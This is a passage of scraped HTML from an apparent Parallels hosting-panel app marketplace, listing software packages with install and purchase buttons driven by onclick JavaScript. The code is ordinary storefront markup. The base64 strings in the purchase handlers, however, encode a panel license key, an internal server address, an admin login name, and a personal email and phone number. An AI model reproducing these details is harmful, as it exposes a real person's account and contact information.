RldGFpbHMlMjU1QnJlbGVhc2UlMjU1RCUzRDM1MCUyNmRldGFpbHMlMjU1QnZlbmRvciUyNTVEJTNEUGlubmFjbGUlMkJDYXJ0JTJCU2hvcHBpbmclMkJDYXJ0JTJCU29mdHdhcmUlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEd3d3LnBpbm5hY2xlY2FydC5jb20lMjZkZXRhaWxzJTI1NUJpc0FwcyUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnBhY2thZ2VVcmwlMjU1RCUzRCZPcGVyYXRpb25JRD1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJmFwcF92ZW5kb3JfbmFtZT1QaW5uYWNsZStDYXJ0K1Nob3BwaW5nK0NhcnQrU29mdHdhcmUmYXBwX25hbWU9UGlubmFjbGVDYXJ0JmFwcF92ZXJzaW9uPTMuNy43JmFwcF9yZWxlYXNlPTM1MCZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnBpbm5hY2xlY2FydC5jb20lMkYm"); apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/drupal.org/Drupal/6.16-3/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'>Drupal</a></h4>
<div class="package-description">Publish, manage and organize a wide variety of content on a website</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/pd6fm_box_mp.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'>Parallels Desktop for Mac</a></h4>
<div class="package-description">Seamlessly run Windows applications on your Mac</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTAzLTE0JTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGUGFyYWxsZWxzJTI1MjUyMERlc2t0b3AlMjUyNTIwZm9yJTI1MjUyME1hYyUyNTJGNi0wJTI1MkZQYXJhbGxlbHMlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5pbnRlcnNwaXJlLmNvbSUyNTJGa25vd2xlZGdlbWFuYWdlciUyNTJGJTI2ZGV0YWlscyUyNTVCbmFtZSUyNTVEJTNEUGFyYWxsZWxzJTJCRGVza3RvcCUyQmZvciUyQk1hYyUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDYlMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QwJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQYXJhbGxlbHMlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRm5jdC5wYXJhbGxlbHMuY29tJTI1MkZmdWxmaWxsJTI1MkYwMjg1LjAwMSZPcGVyYXRpb25JRD1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJmFwcF92ZW5kb3JfbmFtZT1QYXJhbGxlbHMmYXBwX25hbWU9UGFyYWxsZWxzK0Rlc2t0b3ArZm9yK01hYyZhcHBfdmVyc2lvbj02JmFwcF9yZWxlYXNlPTAmYXBwX2d1aWQ9aHR0cCUzQSUyRiUyRnd3dy5pbnRlcnNwaXJlLmNvbSUyRmtub3dsZWRnZW1hbmFnZXIlMkYm"); apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/domains-bttn-small.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'>Domain Names</a></h4>
<div class="package-description">Register a new .COM, .NET or .ORG domain name</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDEwLTEwLTA4JTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGRG9tYWluJTI1MjUyME5hbWVzJTI1MkYxLTElMjUyRlBhcmFsbGVscyUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNmRldGFpbHMlMjU1QmFwcElkJTI1NUQlM0RodHRwJTI1M0ElMjUyRiUyNTJGd3d3LnBhcmFsbGVscy5jb20lMjUyRnByb2R1Y3RzJTI1MkZkbm4lMjUyRmRvbWFpbnMlMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0REb21haW4lMkJOYW1lcyUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQYXJhbGxlbHMlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0QmT3BlcmF0aW9uSUQ9UFVSQ0hBU0VfQVBQTElDQVRJT05fTElDRU5TRSZhcHBfdmVuZG9yX25hbWU9UGFyYWxsZWxzJmFwcF9uYW1lPURvbWFpbitOYW1lcyZhcHBfdmVyc2lvbj0xJmFwcF9yZWxlYXNlPTEmYXBwX2d1aWQ9aHR0cCUzQSUyRiUyRnd3dy5wYXJhbGxlbHMuY29tJTJGcHJvZHVjdHMlMkZkbm4lMkZkb21haW5zJg=="); apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.joomla.org/joomla/1.5.20-2/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'>joomla</a></h4>
<div class="package-description">Build website and powerful online applications</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/keepit-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'>Keepit Online Backup</a></h4>
<div class="package-description">Backup desktop files and documents to the Cloud</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDA5LTA3LTI3JTI1M0ElMjUyRm5vbmUlMjUyRktlZXBpdCUyNTJGS2VlcGl0JTI1MjUyME9ubGluZSUyNTI1MjBCYWNrdXAlMjUyRjEtMSUyNTJGS2VlcGl0JTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI2ZGV0YWlscyUyNTVCYXBwSWQlMjU1RCUzRGh0dHBzJTI1M0ElMjUyRiUyNTJGd3d3LmtlZXBpdC5jb20lMjUyRnVubGltaXRlZCUyNmRldGFpbHMlMjU1Qm5hbWUlMjU1RCUzREtlZXBpdCUyQk9ubGluZSUyQkJhY2t1cCUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RLZWVwaXQlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNES2VlcGl0JTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRnd3dy5rZWVwaXQuY29tJTI1MkZkb3dubG9hZHN0ZXAmT3BlcmF0aW9uSUQ9UFVSQ0hBU0VfQVBQTElDQVRJT05fTElDRU5TRSZhcHBfdmVuZG9yX25hbWU9S2VlcGl0JmFwcF9uYW1lPUtlZXBpdCtPbmxpbmUrQmFja3VwJmFwcF92ZXJzaW9uPTEmYXBwX3JlbGVhc2U9MSZhcHBfZ3VpZD1odHRwcyUzQSUyRiUyRnd3dy5rZWVwaXQuY29tJTJGdW5saW1pdGVkJg=="); apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/PPAV-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'>Parallels Premium Anti-Virus</a></h4>
<div class="package-description">Protect your customers&#039; mailboxes against worms, Trojans and other viruses</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDEwLTEwLTIxJTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGUGFyYWxsZWxzJTI1MjUyMFByZW1pdW0lMjUyNTIw